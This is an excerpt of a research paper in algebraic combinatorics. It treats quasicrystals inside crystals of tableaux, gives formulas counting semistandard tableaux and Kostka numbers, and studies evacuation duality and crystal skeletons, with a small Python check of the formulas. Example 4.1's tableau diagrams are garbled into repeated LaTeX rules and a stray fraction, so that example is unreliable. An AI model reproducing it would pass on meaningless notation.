Let's note that, for \(1\leq s\leq n\), \[F_{(m)}(x_{1},\ldots,x_{n-s+1})=F_{\varnothing}(x_{1},\ldots,x_{n-s+1})=\sum_{ 1\leq i_{i}\leq i_{2}\leq\ldots\leq i_{m}\leq n-s+1}x_{i_{1}}x_{i_{2}}\ldots x _{i_{m}}.\] The weakly increasing sequence of integers which index each monomial of \(F_{\varnothing}(x_{1},\ldots,x_{n-s+1})\) is in bijection with the weakly increasing sequence of integers indexing the monomials of any \(F_{I}\), with \(I=\{j_{1},\ldots,j_{s-1}\}\), through the following bijection. \[1\leq i_{i}\leq i_{2}\leq\ldots\leq i_{m}\leq n-s+1\] \[\downarrow\] \[1\leq i_{i}\leq\ldots\leq i_{j_{1}}<i_{j_{1}+1}+1\leq\ldots\leq i_{j_{2}}+1< i_{j_{2}+1}+2\leq\ldots\leq i_{j_{k}}+(k-1)<i_{j_{k}+1}+k\leq\] \[\ldots\leq i_{j_{s-1}}+(s-2)<i_{j_{s-1}+1}+(s-1)\leq\ldots\leq i_{m}+(s-1) \leq(n-s+1)+(s-1)=n.\] All possible sequences of indices in \(f_{I}\) can be retreived this way, and the strict ascents will be respected. One can find the initial sequence by removing \(i\) from each part between the \(i^{\rm th}\) and the \(i+1^{\rm th}\) increasing sign \(<\). Similarly as before, all sequences of \(F_{\varnothing}\) can be retreived this way. Lets now fix \(n,m\), \(1\leq s\leq n\), a composition \(\alpha\) of \(m\) in \(s\) parts, and any shape \(\lambda\vdash m\) in which \(\alpha\) appears as a descent composition. The sequences of indices above then give fillings of the maximal horizontal bands of type \(\alpha\) in \(\lambda\): indices \(i_{j}\) indexed by \(1\leq j\leq j_{1}\) fill the first horizontal band, indices \(i_{j}\) indexed by \(j_{1}+1\leq j\leq j_{2}\) fill the second horizontal band, etc. Let us replace the tableaux in the crystal \(B(m)_{n-s+1}\) by the corresponding tableaux according to the above bijection. Then the first tableau has weight and minimal parsing of type \(\alpha\), i.e. if indexing the integers by their position in the sequence, we get \[1\leq 1_{1}\leq\ldots\leq 1_{j_{1}}<2_{j_{1}+1}\leq\ldots\leq 2_{j_{2}}<3_{j_{ 2}+1}\leq\ldots\leq k_{j_{k}}<(k+1)_{j_{k}+1}\leq\ldots\leq s_{m}\leq n.\] Since the indices \(i_{j}\) correspond to entries in a tableau, we can consider how crystal operators act on such entries. We are restricting ourselves to crystal operators which preserve the parsing, so they may only be applied to the indices \(i_{j}\) if the weak order described above is preserved. In particular, the crystal operators which may be applied on the sequence, without breaking its weak order, are \(f_{i_{j_{k}+\ell}+k}\) if \(f_{i_{j_{k}+\ell}}\) can be applied to the corresponding tableau in \(B(m)_{n-s+1}\). Then the structure of the quasicrystal \(B(\alpha)\) will be exactly that of \(B(m)_{n-s+1}\), with some relabelled oriented edges. Finally, this is independent of \(\lambda\), since only the weakly increasing sequence is important in the above isomorphism. \(\blacksquare\) **Corollary 3.1 :** Let \(n,m\in\mathbb{N}\) be fixed, and consider any composition \(\alpha\) of \(m\) in \(s\leq n\) parts. Then the number of monic monomials in \(F_{\alpha}(x_{1},\ldots,x_{n})\) is equal to the number of monic monomials in \(F_{(m)}(x_{1},\ldots,x_{n-s+1})\). **Corollary 3.2 :** For \(n\) fixed, and a fixed composition \(\alpha\), all subcomponents \(B(T_{\alpha})_{n}\) are isomorphic as labelled oriented graphs, no matter the crystal \(B(\lambda)_{n}\) they live in. _Proof._ We have seen that \(B(\alpha)\) is isomorphic to \(B(m)_{n-s+1}\), where \(n\) is the fixed maximal entry in the tableaux of \(B(\alpha)\), \(m=|\alpha|\) and \(s=\ell(\alpha)\). 
Moreover, the isomorphism seen in the proof above does not depend on the shape \(\lambda\) of tableaux, and the modifications of the labels only depend on \(\alpha\). Therefore, a crystal operator can be applied on all tableaux in a given position in different \(B(\alpha)\)'s, no matter their shapes. \(\blacksquare\) In other words, it is justified to study graphs (or quasicrystals) associated to quasisymmetric functions \(F_{\alpha}\), as their oriented graph structure is determined for any fixed \(n\). We could also use a notation \(B(m,n,s)\) as only these values are important in defining the oriented graph structure: relabellings of crystals \(B(m)\) with maximal entry \(n-s+1\). In particular, all \(B(\alpha)_{n}\) for any composition of \(m\) in \(s\leq n\) parts will have the same oriented graph structure: that of \(B(m)_{n-s+1}\). **Remark 3.3 :** We can consider how the crystal operators will act on such weakly increasing sequences. For one thing, a crystal operator \(f_{i}\) will act on the rightmost \(i\) in the sequence, as long as it does not break the increasing sequences: the entries \(i\) can only appear in one horizontal band at the time, in order to preserve the strict increasingness of the sequence, and the rightmost will correspond to the \(NE\) most entry \(i\) in the tableau. This agrees with the parenthesis rule. ### Height of quasicrystals, sources and sinks **Corollary 3.4 :** The quasicrystals \(B(\alpha)_{n}\) have height, or length of their maximal subchain, \(m\cdot(n-s)+1\), where \(n\) is the fixed maximal entry, \(s=\ell(\alpha)\) and \(|\alpha|=m\). _Proof._ The subcomponents \(B(T_{\alpha})\) in any crystal \(B(\lambda)\) contain the chain of tableaux with transformations given by \((f_{n-s}^{\alpha_{1}}\circ\ldots\circ f_{2}^{\alpha_{1}}\circ f_{1}^{\alpha_{ 1}})\circ\ldots\circ(f_{n-2}^{\alpha_{s-1}}\circ\ldots\circ f_{s}^{\alpha_{s- 1}}\circ f_{s-1}^{\alpha_{s-1}})\circ(f_{n-1}^{\alpha_{s}}\circ\ldots\circ f_ {s+1}^{\alpha_{s}}\circ f_{s}^{\alpha_{s}})\), which modifies maximally one horizontal band at a time, from its head to its tail: all entries \(s\) are changed to \(s+1\)'s, then into \(s+2\)'s, etc. until they are all changed into \(n\)'s. Then all entries \(s-1\) are changed into \(s\)'s, then into \(S+1\)'s, etc. until they have all been changed into \(n-1\)'s. This process is continued until all entries \(1\) have been changed into \(n-s\)'s and no more transformations can be applied without modifying the minimal parsing into horizontal bands. This sequence of transformations preserves the parsing into horizontal bands, so we remain always in the same subcomponent \(B(T_{\alpha})\). Moreover, no crystal operator can be applied to the final tableau of the chain without coming out of the subcomponent. We have then obtained, and described, the sink of the subcomponent \(B(T_{\alpha})\): preserving the same minimal parsing as the source, entries \(i\) are replaced by \(n-s+i\). This tableau has weight \((0^{n-s},\alpha)\). There are \(|\alpha|\cdot(n-s)\) crystal operators in this sequence of transformations, and it describes a chain of length \(|\alpha|\cdot(n-s)+1\) in any subcomponent \(B(T_{\alpha})_{n}\), when adding the source to which the crystal operators are applied. Since the chain starts from the source and ends at the sink, it is maximal, since \(f_{i}\) has a unique image going down each row of \(B(\lambda)\). Then, any maximal chain in a quasicrystal \(B(\alpha)\) will have the same length: \(|\alpha|\cdot(n-s)+1\). 
Since the oriented graph structure of \(B(\alpha)\) is only determined by \(n,m=|\alpha|\) and \(s\), then the height \(|\alpha|\cdot(n-s)+1=m\cdot(n-s)+1\), also only depends on \(n,m,s\). \(\blacksquare\) **Corollary 3.5 :** The sink of a subcomponent \(B(T_{\alpha})\) is obtained from its source \(T_{\alpha}\) by replacing entries \(i\) by \(n-s+i\), where \(s\) is the length of \(\alpha\). ### Number of semistandard tableaux of shape \(\lambda\) and maximal entry \(n\), and Kostka numbers Using the results above, we give a formula for computing the number of tableaux of a given shape \(\lambda\) and maximal possible entry \(n\). In other words, we count the number of tableaux in \(B(\lambda)_{n}\), which is equal to the number of monic monomials in \(s_{\lambda}(x_{1},x_{2},\ldots,x_{n})\). We have seen that \(s_{\lambda}=\sum_{T\in SYT(\lambda)}F_{DesComp(T)}\), and that each quasisymmetric function \(F(\alpha)\) corresponds to a subcomponent \(B(T_{\alpha})\) in the crystal \(B(\lambda)_{n}\), whose vertices are all tableaux of shape \(\lambda\) and maximal entry \(n\). The number of standard tableaux of shape \(\lambda\) is well known to be given by the hook-length formula, and are generally not too hard to enumerate. We have seen that all \(B(\alpha)_{n}\) for compositions \(\alpha\) of \(m\) with the same number \(s\leq n\) of parts are isomorphic to \(B(m)_{n-s+1}\), and that these subcomponents of \(B(\lambda)_{n}\) are counted by the number of standard tableaux with \(d=s-1\) descents. It would then suffice to have formulas for the number of tableaux in \(B(m)_{n-d}\) and for the number of standard tableaux of shape \(\lambda\) with \(d\) descent to give a formula for the number of semistandard tableaux of shape \(\lambda\). Using the results above allows us to do this. **Proposition 3.6 :** The number of tableaux in \(B(m)_{k}\) is equal to the multiset coefficient and binomial coefficient below. \[\left(\left(\begin{array}{c}m+1\\ k-1\end{array}\right)\right)=\left(\begin{array}{c}m+k-1\\ k-1\end{array}\right)=\frac{(m+1)\cdot(m+2)\cdot\ldots\cdot(m+k-1)}{(k-1)!}.\] _Proof._ For all tableaux of shape \((m)\), one must chose the position after which the array holds no more 1's, then the position after which the array holds no more 1's and 2's, etc. up to the end of the array, which is filled with \(k\)'s after the \(k-1^{\rm th}\) position. We want to allow repetitions of chosen positions, since we want to allow that an entry does not appear and is "sandwiched out". We also want to allow the tableau with only 1's, which is the source of \(B(m)_{k}\), so we add 1 position which lies outside of the array. Then if this outside position is picked \(j\) times, for \(1\leq j\leq k-1\), the entries \(k-j+1\) to \(k\) will not appear in the array. Therefore, one chooses \(k-1\) positions in the \(m+1\) possible ones for the breaks between integers, allowing for repetitions, and without keeping track of the order in which the positions are picked. This gives precisely the multiset coefficient above. **Example 3.7 :** The arrays below have their corresponding multiset of positions of breaks noted under them, for \(m=10\) and maximal entry \(k=5\). 
\[\frac{\framebox{1111111133}}{\{8,8,11,11\}}\ \ \frac{\framebox{1122222444}}{\{2,7,7,11\}}\ \ \frac{\framebox{1555555555}}{\{1,1,1,1\}}\]

**Corollary 3.8 :** The number of tableaux with maximal entry \(n\) in a quasicrystal \(B(\alpha)_{n}\), for any composition \(\alpha\) of \(m\) in \(s\) parts, is given by

\[\left(\left(\begin{array}{c}m+1\\ n-s\end{array}\right)\right)=\left(\begin{array}{c}m+n-s\\ n-s\end{array}\right)=\frac{(m+1)\cdot(m+2)\cdot\ldots\cdot(m+n-s)}{(n-s)!}.\]

**Corollary 3.9 :** For any composition \(\alpha\vDash m\) in \(s\) parts, the number of monic monomials in \(F_{\alpha}(x_{1},\ldots,x_{n})\) is equal to the binomial coefficient above.

**Theorem 3 :** The number of tableaux of shape \(\lambda\) with maximal entry \(n\) is given by

\[|SSYT(\lambda)_{n}|=\sum_{0\leq d\leq D}f_{d}^{\lambda}\cdot\left(\begin{array}{c}|\lambda|+n-d-1\\ n-d-1\end{array}\right),\]

where \(f_{d}^{\lambda}\) denotes the number of standard tableaux of shape \(\lambda\) with \(d\) descents, and \(D\) is the maximal number of descents in a standard tableau of shape \(\lambda\).

**Example 3.10 :** There are 14 standard tableaux of shape \((4,3)\), which all appear in figure 3. Among these, two have one descent, eight have two and four have three. Then the number of tableaux of shape \((4,3)\) with maximal entry \(n\), for any \(n\), is equal to

\[|SSYT((4,3))_{n}|=2\cdot\left(\begin{array}{c}7+n-1-1\\ n-1-1\end{array}\right)+8\cdot\left(\begin{array}{c}7+n-2-1\\ n-2-1\end{array}\right)+4\cdot\left(\begin{array}{c}7+n-3-1\\ n-3-1\end{array}\right)\!.\]

One may verify that when \(n=4\), one retrieves 140 tableaux, the number of tableaux in figure 2. The following values for \(n=5,6,7\) (for the same shape \((4,3)\)) are respectively \(560\), \(1764\) and \(4704\) tableaux, which shows how fast these numbers grow; a computational check of these values appears below. This formula can then really help to enumerate tableaux of a given shape, especially when \(n\) is large.

Proof of theorem 3.: Recall that a tableau with \(d\) descents will have an associated descent composition in \(s=d+1\) parts. Let then \(D\) be the maximal number of descents in standard tableaux of shape \(\lambda\), and let \(S\) be the maximal number of parts of the associated descent compositions. When \(n=D+1=S\), all connected components are present in \(B(\lambda)_{n}\). All those associated to a descent composition \(\alpha\) in \(s=d+1\) parts are isomorphic to a crystal \(B(m)_{k}\), whose number of vertices is the multiset coefficient above, where \(k=n-s+1=n-d\) and \(m=|\lambda|=|\alpha|\). The quasicrystals in \(B(\lambda)_{n}\) are disjoint, and are counted by the standard tableaux of shape \(\lambda\). Therefore we have the formula above. Moreover, this formula accounts for the cases where \(n<D+1=S\), since the terms of the summation with \(n<d+1\leq D+1\) will be zero.

**Corollary 3.11 :** For a partition \(\lambda\vdash m\), the number of monic monomials in \(s_{\lambda}(x_{1},\ldots,x_{n})\) is equal to the sum above.

Although very interesting, the formula above for the number of tableaux of shape \(\lambda\) and maximal entry \(n\) does not solve the much more interesting problem of giving a (closed) formula for Kostka numbers \(K_{\mu}^{\lambda}\), a problem highlighted by Stanley ([Stanley, 2012], Vol.2, section 7.10). Recall that these \(K_{\mu}^{\lambda}\) count the number of tableaux of shape \(\lambda\vdash m\) and filling \(\mu\) (a fixed composition of \(m\)).
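Before discussing Kostka numbers further, we note that Theorem 3 is easy to check computationally. The sketch below is our own Python code (the helper `ssyt_count` is not from the article); it evaluates the formula for \(\lambda=(4,3)\) using the counts of standard tableaux from Example 3.10 and recovers the values 140, 560, 1764 and 4704 quoted there.

```python
from math import comb

def ssyt_count(m, f_by_descents, n):
    """Theorem 3: number of SSYT of a shape lambda with |lambda| = m and entries at most n,
    given f_by_descents[d] = number of standard tableaux of that shape with d descents."""
    return sum(f * comb(m + n - d - 1, n - d - 1)
               for d, f in f_by_descents.items() if n - d - 1 >= 0)

# lambda = (4,3): 2 standard tableaux with 1 descent, 8 with 2, 4 with 3 (Example 3.10)
f43 = {1: 2, 2: 8, 3: 4}
assert [ssyt_count(7, f43, n) for n in range(4, 8)] == [140, 560, 1764, 4704]
```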
There is however a combinatorial formula, given below, for which only a bijective proof is known. The setting of quasicrystals allowes us to give a constructive combinatorial proof, which we discuss below. **Proposition 3.12 ([Sagan, 2001, Proposition 5.3.6]) :** Let \(\lambda\vdash n\), \(S=\{n_{1}<n_{2}<\ldots<n_{k}\}\subseteq[n-1]\), and \(\mu=(n_{1},n_{2}-n_{1},\ldots,n-n_{k})\). Then \[|\{P:P\mbox{ a standard $\lambda$-tableau and }Des(P)\subseteq S\}|=K_{\mu}^{\lambda}.\] **Proposition 3.13**: **:** A given weight \(\mu\) appears exactly once in a quasicrystal \(B(\alpha)\), and if and only if \(\alpha\preccurlyeq\mu\). _Proof._ We have seen that all weights \(\alpha\preccurlyeq\mu\) in at most \(n\) parts occur in \(B(\alpha)_{n}\), and only such weights appear in \(B(\alpha)_{n}\). Moreover, for a given minimal parsing of type \(\alpha\) of a given shape \(\lambda\), \(\alpha\preccurlyeq\mu\) defines uniquely a tableau of shape \(\lambda\) in the corresponding subcomponent \(B(T_{\alpha})_{n}\) in \(B(\lambda)_{n}\), where \(T_{\alpha}\) has the desired minimal parsing. Therefore, in any subcomponent \(B(T_{\alpha})_{n}\), there is exactly one tableau of the desired weight \(\mu\) in at most \(n\) parts. \(\blacksquare\) By the above, each subcomponent \(B(T_{\alpha})\) in \(B(\lambda)\) with \(\alpha\preccurlyeq\mu\) will contain exactly one tableau of filling \(\mu\). This gives us the following reinterpretation of Proposition 3.12, with a constructive proof. **Corollary 3.14**: **:** The Kostka number \(K_{\mu}^{\lambda}\) counting tableaux of shape \(\lambda\) and composition weight \(\mu\) is given by the number of subcomponents \(B(T_{\alpha})\) of \(B(\lambda)\) such that \(\alpha\preccurlyeq\mu\), and this number is given by the number of standard tableaux with descent composition \(\alpha\) with \(\alpha\preccurlyeq\mu\). So \[K_{\mu}^{\lambda}=\left|\{T\in SYT(\lambda):DesComp(T)\preccurlyeq\mu\} \right|.\] ## 4 Layout of subcomponents \(B(T_{\alpha})\) in a crystal \(B(\lambda)\) From the previous sections, we have a decomposition of \(B(\lambda)\) into a disjoint union of induced subgraphs \(B(T_{\alpha})\) corresponding to the \(F_{\alpha}\) appearing in the expansion of \(s_{\lambda}\) in the basis of fundamental quasisymmetric functions. Each of these subcomponents regroup tableaux with a specific minimal parsing of type \(\alpha\) and correspond to the standard tableau of shape \(\lambda\) with the same minimal parsing. In this section, we study how a crystal \(B(\lambda)\) breaks down into these subcomponents, by looking at how they are positioned relatively to one another. In order to understand better their distribution, we need to introduce the evacuation involution EVAC on tableaux, as we'll show it is a crystal anti-automorphism on \(B(\lambda)_{n}\) which reverses descent compositions and respects the above decomposition. The evacuation map then sets up a duality between subcomponents associated to descent compositions \(\alpha=(\alpha_{1},\ldots,\alpha_{s})\) and those associated to its reverse composition \(\overleftarrow{\alpha}=(\alpha_{s},\ldots,\alpha_{1})\). The dual subcomponents will appear in dual position in \(B(\lambda)\), and will be dual to one to another as graphs. We also study the (fixed) skeleton structure of \(B(\lambda)\) obtained by replacing each subcomponent by the associated standard tableau, and compare this underlying graph structure on standard tableaux with the one of dual equivalence graphs, introduced by Assaf [Assaf, 2015]. 
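Before turning to evacuation, we note that Corollary 3.14 can be checked directly on small shapes by brute force. The following Python sketch is our own code (none of the helper names come from the article, and the enumeration is naive, intended only for small shapes); it generates the standard tableaux of a shape, computes their descent compositions, and counts those whose descent composition is refined by \(\mu\).

```python
def standard_tableaux(shape):
    """All standard Young tableaux of a partition shape, as tuples of rows (top row first)."""
    m = sum(shape)
    def fill(rows, k):
        if k > m:
            yield tuple(tuple(r) for r in rows)
            return
        for r, row in enumerate(rows):
            # entry k may end row r if the row is not full and the row above is strictly longer
            if len(row) < shape[r] and (r == 0 or len(rows[r - 1]) > len(row)):
                row.append(k)
                yield from fill(rows, k + 1)
                row.pop()
    return fill([[] for _ in shape], 1)

def descent_composition(t):
    """Descent composition of a standard tableau: i is a descent if i+1 lies in a lower row."""
    row_of = {entry: r for r, row in enumerate(t) for entry in row}
    m = len(row_of)
    cuts = [0] + [i for i in range(1, m) if row_of[i + 1] > row_of[i]] + [m]
    return [b - a for a, b in zip(cuts, cuts[1:])]

def refines(alpha, beta):
    """True if beta refines alpha (alpha ≼ beta)."""
    i = 0
    for part in alpha:
        total = 0
        while total < part and i < len(beta):
            total += beta[i]
            i += 1
        if total != part:
            return False
    return i == len(beta)

def kostka(shape, mu):
    """K^lambda_mu as the number of standard tableaux whose descent composition is refined by mu."""
    return sum(refines(descent_composition(t), mu) for t in standard_tableaux(shape))

assert kostka((3, 2), (2, 2, 1)) == 2
assert kostka((3, 2), (1, 1, 1, 1, 1)) == 5   # weight (1,...,1): all 5 standard tableaux
assert kostka((4, 3), (4, 3)) == 1            # weight lambda itself: only the tableau 1_lambda
```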
### Evacuation as a crystal anti-automorphism The evacuation involution was first introduced by Schutzenberger as an involution on tableaux of the same shape \(\lambda\)[Schutzenberger, 1963]. Berenstein and Zelevinsky showed that the effect of evacuation can be described in the following way [Berenstein and Zelevinsky, 1996]. Let \(T\) be a tableau of any shape. Rotate \(T\)\(180^{\circ}\), change entries \(i\) to \(n-i+1\), where \(n\) is the largest entry in \(T\), and rectify this skew tableau using jeu de taquin (see section 5 for a recall of the proces of rectifications). We shall use this result as the definition of evacuation: \(\mbox{EVAC}=jdt\circ\mbox{compl}\circ Rot_{180^{\circ}}\), where \(Rot_{180^{\circ}}\), compl and \(jdt\) are the three intermediate manipulations described above. The obtained tableau EVAC(\(T\)) has the same shape as \(T\), and applying EVAC to it recovers \(T\)[Berenstein and Zelevinsky, 1996]. **Example 4.1 :** For the straight tableau \(T=\)\(jdt\circ\mbox{compl}\circ Rot_{180^{\circ}}\left(T\right)=jdt\circ\mbox{ compl}\left(\begin{array}{c|c}\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\end{array}\right)=jdt\left( \begin{array}{c|c}\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline \hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline \hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\end{array}\right)= \frac{1}{2}\left[\begin{array}{c|c}\hline\hline\hline\hline\hline\hline\hline\hline \hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline \hline\hline\hline\end{array}\right)=\frac{1}{2}\left[\begin{array}{c|c}\hline \hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline\hline \hline\hline\hline\hline\hline\end{array}\right]=\mbox{EVAC}\left(T\right)\). One may verify that repeating this process on EVAC(\(T\)) recovers \(T\). Berenstein and Zelevinsky showed that EVAC is an anti-automorphism on crystals \(B(\lambda)_{n}\)[Berenstein and Zelevinsky, 1996]. This means that if a tableau \(T\) is obtained from the source \(1_{\lambda}\) of the crystal by a sequence of crystal operators \(T=f_{i_{k}}\circ f_{i_{k-1}}\circ\ldots\circ f_{i_{2}}\circ f_{i_{1}}(1_{ \lambda})\), then EVAC(\(T\)) = \(e_{n-i_{k}}\circ e_{n-i_{k-1}}\circ\ldots\circ e_{n-i_{2}}\circ e_{n-i_{1}}(T _{min})\), where \(T_{min}\) is the sink of the crystal, which would then be EVAC(\(1_{\lambda}\)). The original proof of Berenstein and Zelevinsky uses crystal theory and representation theory heavily, so we give an alternate proof of this fact in annex A, which may be more accessible. We also believe our proof to be of interest on its own, as it uses an anti-automorphism of crystals on words, defined by \(Rot(w)=w_{0}ww_{0}\), which has been already studied in the literature. We also give a proof that EVAC reverses descent compositions. ### Double duality of subcomponents \(B(T_{\alpha})\) and \(B(T_{\alpha})\) in \(B(\lambda)\) There are two notions of duality at play in this section. 
The notion of duality which comes from graph (or poset) theory, where the dual of a labelled oriented graph is the graph obtained by reversing arrows, relabelling by \(n-i+1\), and replacing each vertex by its \({}^{*}\)dual image\({}^{*}\). There is also the notion of duality coming from the involution EVAC, where EVAC(\(A\)) is dual to \(A\) for a set of tableaux \(A\). In the case of the subcomponents of a crystal \(B(\lambda)_{n}\), we will see that these two notions of duality coincide, as evacuation sets up a duality between the subcomponents. For each subcomponent \(B(T_{\alpha})\), there will be a subcomponent \(B(T_{\stackrel{{\leftarrow}}{{\alpha}}})\) such that they are the reciprocal image under the EVAC map and are the dual graphs of one another, where the dual image of each vertex is precisely its image under the EVAC map. We also say they are placed dually in \(B(\lambda)_{n}\), since EVAC is an anti-automorphism of crystals on \(B(\lambda)_{n}\). It then gives us the following results on the subcomponents of \(B(\lambda)\) associated to the fundamental quasisymmetric functions \(F_{\alpha}\). **Theorem 4 :** Subcomponents \(B(T_{\alpha})\) and \(B(T_{\stackrel{{\leftarrow}}{{\alpha}}})\) both necessarily appear in a given crystal \(B(\lambda)\), they are dual to each other and are positioned in dual locations in \(B(\lambda)\). The crystal anti-automorphism between them is the evacuation map EVAC. _Proof._ We have seen that the source of a subcomponent \(B(T_{\alpha})\) is the tableau \(T_{\alpha}\) of shape \(\lambda\), with filling and descent composition \(\alpha\). Consider a set \(A\) of tableaux in \(B(T_{\alpha})\). Since EVAC reverses descent compositions, then EVAC\((A)\) will be a set of tableaux with descent composition \(\stackrel{{\leftarrow}}{{\alpha}}\). Moreover, since it is also a crystal anti-automorphism, if a tableau \(T\in A\) is obtained from \(T_{\alpha}\) by a sequence of crystal operators \(f_{i}\) which preserve descent compositions, then EVAC\((T)\) is obtained from EVAC\((T_{\alpha})\) by the complementary sequence of crystal operators \(e_{n-i}\), and so the set EVAC\((A)\) is connected and regroups tableaux with same descent composition \(\stackrel{{\leftarrow}}{{\alpha}}\). This is because the \(f_{i}\)'s modify the weight by \(b_{i+1}-b_{i}\), and the \(e_{i}\)'s, by \(-b_{i+1}+b_{i}\), so the effect of \(f_{i}\) on a weight \(\gamma\) will be dual to that of \(e_{n-i}\) on \(\stackrel{{\leftarrow}}{{\gamma}}\). Then, subcomponents \(B(T_{\alpha})\) are mapped onto subcomponents \(B(T_{\stackrel{{\leftarrow}}{{\alpha}}})\), and they are dual to each other as graphs, with the dual image of each vertex given by their image under EVAC. Finally, by the previous argument, we also have that the two subcomponents are positionned dually in \(B(\lambda)\): if a sequence of crystal operators \(f_{i_{k}}\circ\ldots\circ f_{i_{1}}\), applied to the source \(1_{\lambda}\) of \(B(\lambda)_{n}\), gives a vertex of \(B(T_{\alpha})\), then the "dual" sequence \(e_{n-i_{k}+1}\circ\ldots\circ e_{n-i_{1}+1}\), applied to the sink EVAC\((1_{\lambda})\) of \(B(\lambda)_{n}\), gives its dual image in \(B(T_{\stackrel{{\leftarrow}}{{\alpha}}})\), EVAC\((T_{\alpha})\). \(\blacksquare\) This tells us that the evacuation map respects intrinsically the decomposition of \(B(\lambda)\) into its subcomponents \(B(T_{\alpha})\). 
**Corollary 4.2 :** The source \(T_{\alpha}\) of a subcomponent \(B(T_{\alpha})\) is sent by EVAC onto the sink of the corresponding dual subcomponent \(B(T_{\overleftarrow{\alpha}})\), and conversely.

**Example 4.3 :** Figure 2 illustrates the duality (and symmetry) of the positioning of the subcomponents \(B(T_{\alpha})\) and \(B(T_{\overleftarrow{\alpha}})\). Note how the two subcomponents associated to \((2,3,2)\) are dual, and start and end on the same rows of the crystal.

**Proposition 4.4 :** The quasicrystals \(B(\alpha)\) are self-dual as labelled oriented graphs when \(\alpha\) is symmetric, i.e. \(\alpha=\overleftarrow{\alpha}\).

**Remark 4.5 :** This self-duality holds for the structure of the quasicrystals \(B(\alpha)\) (as graphs). However, the subcomponents \(B(T_{\alpha})\) are not necessarily sent onto themselves under the EVAC map, as illustrated in example 4.3.

_Proof of Proposition 4.4._ EVAC is an anti-automorphism which sends a subcomponent \(B(T_{\alpha})\) onto a subcomponent \(B(T_{\overleftarrow{\alpha}})\). Since both subcomponents are then isomorphic and dual, and all subcomponents in \(B(\alpha)\) are isomorphic, then \(B(\alpha)\) is self-dual as a labelled oriented graph when \(\alpha=\overleftarrow{\alpha}\). \(\blacksquare\)

**Corollary 4.6 :** For a fixed composition \(\alpha\), all subcomponents \(B(T_{\alpha})\) have their source on the same row \(j+1\) of \(B(\lambda)\), where \(j\) is the number of transformations \(+(b_{i+1}-b_{i})=+(0,\ldots,0,-1,1,0,\ldots,0)\) applied to \(\lambda\) to obtain \(\alpha\), or equivalently the number \(j\) of crystal operators \(f_{i}\) applied to \(1_{\lambda}\) to obtain \(T_{\alpha}\).

_Proof._ We have seen that the crystal operators \(f_{i}\) have effect \(+(b_{i+1}-b_{i})\) on the weight of tableaux. Then row \(j+1\) of \(B(\lambda)\) holds all tableaux obtained from \(1_{\lambda}\) by applying \(j\) crystal operators \(f_{i}\). If a certain sequence of crystal operators \(f_{i_{1}},f_{i_{2}},\ldots,f_{i_{j}}\) modifies \(\lambda\) to obtain \(\alpha\), then all tableaux of weight \(\alpha\) are obtained by the application of a certain reordering of these crystal operators. Then, all tableaux of weight \(\alpha\) will be on the same row \(j+1\). Among these, all tableaux with weight and minimal parsing of type \(\alpha\) lie on this row \(j+1\) of \(B(\lambda)\). Since these are the sources of the subcomponents \(B(T_{\alpha})\), we have the desired result. \(\blacksquare\)

**Remark 4.7 :** In a crystal \(B(\lambda)\), all descent compositions \(\alpha\) occur as weights of tableaux, and are therefore obtained from \(\lambda\) by applying modifications \(b_{i+1}-b_{i}\), from \(\lambda\) to \(\overleftarrow{\lambda}\). Moreover, the descent compositions \(\alpha\) are not refinements of another composition and do not include zero parts (by their definition as counting lengths of horizontal bands in minimal parsings).

### Crystal skeleton

If we replace every subcomponent of \(B(\lambda)_{n}\) by the associated standard tableau of shape \(\lambda\), and keep only one oriented edge between linked subcomponents, with one copy of each label that appears at least once, one gets a labelled oriented graph on standard tableaux. Note that this can create cycles. We will see that we can restrict this further by keeping only the minimal label on each oriented edge. We call the result the skeleton of \(B(\lambda)_{n}\).
This notion of skeleton is especially interesting because it gives a compact visual representation of \(B(\lambda)_{n}\) for any \(n\), and also of \(B(\lambda)\), as we will see. Doing this to figure 2, one gets the labelled oriented graph on standard tableaux of shape \((4,3)\) of figure 3. Since we know the oriented graph structure of these subcomponents by corollary 3.2, these can be expanded to essentially retrieve the full graph, with some edges missing between subcomponents. Note the symmetry coming from the self-duality of \(B(\lambda)\).

The obtained labelled oriented graph on standard tableaux does not have a crystal structure, in particular because a standard tableau can have two distinct images for the same transformation. For example, in figure 3, the top standard tableau (sometimes referred to as the _superstandard tableau_) has three distinct images under the edges labelled \(1\). We will see in the proposition below that we are justified in keeping only the minimal label on oriented edges between subcomponents.

Figure 3: Skeleton of \(B(4,3)_{4}\), where subcomponents are replaced by their associated standard tableau. Labelled oriented edges \(i\) indicate that transformations \(f_{i}\) move from one subcomponent to another, and \(i\) is minimal (by definition). Labels are colored according to the origin subcomponent for clarity. The vertical position of a vertex is determined by the row of the source of the associated connected component in \(B(4,3)_{4}\), and alternatively also segregates standard tableaux by their number of descents.

**Proposition 4.8 :** Let \(n\) and \(\lambda=(\lambda_{1},\lambda_{2},\ldots,\lambda_{\ell})\) be fixed. Let \(std(T_{\alpha})\) and \(std(T_{\beta})\) be standard tableaux of shape \(\lambda\), and of respective descent compositions \(\alpha=(\alpha_{1},\ldots,\alpha_{k})\) and \(\beta=(\beta_{1},\ldots,\beta_{s})\). Let \(i\) be the smallest index such that a crystal operator \(f_{i}\) allows one to pass between the associated subcomponents \(B(T_{\alpha})\) and \(B(T_{\beta})\) in \(B(\lambda)_{n}\), for \(1\leq i\leq n-1\). Then the crystal operators \(f_{i+1},\ldots,f_{i+(n-s)}\) do too.

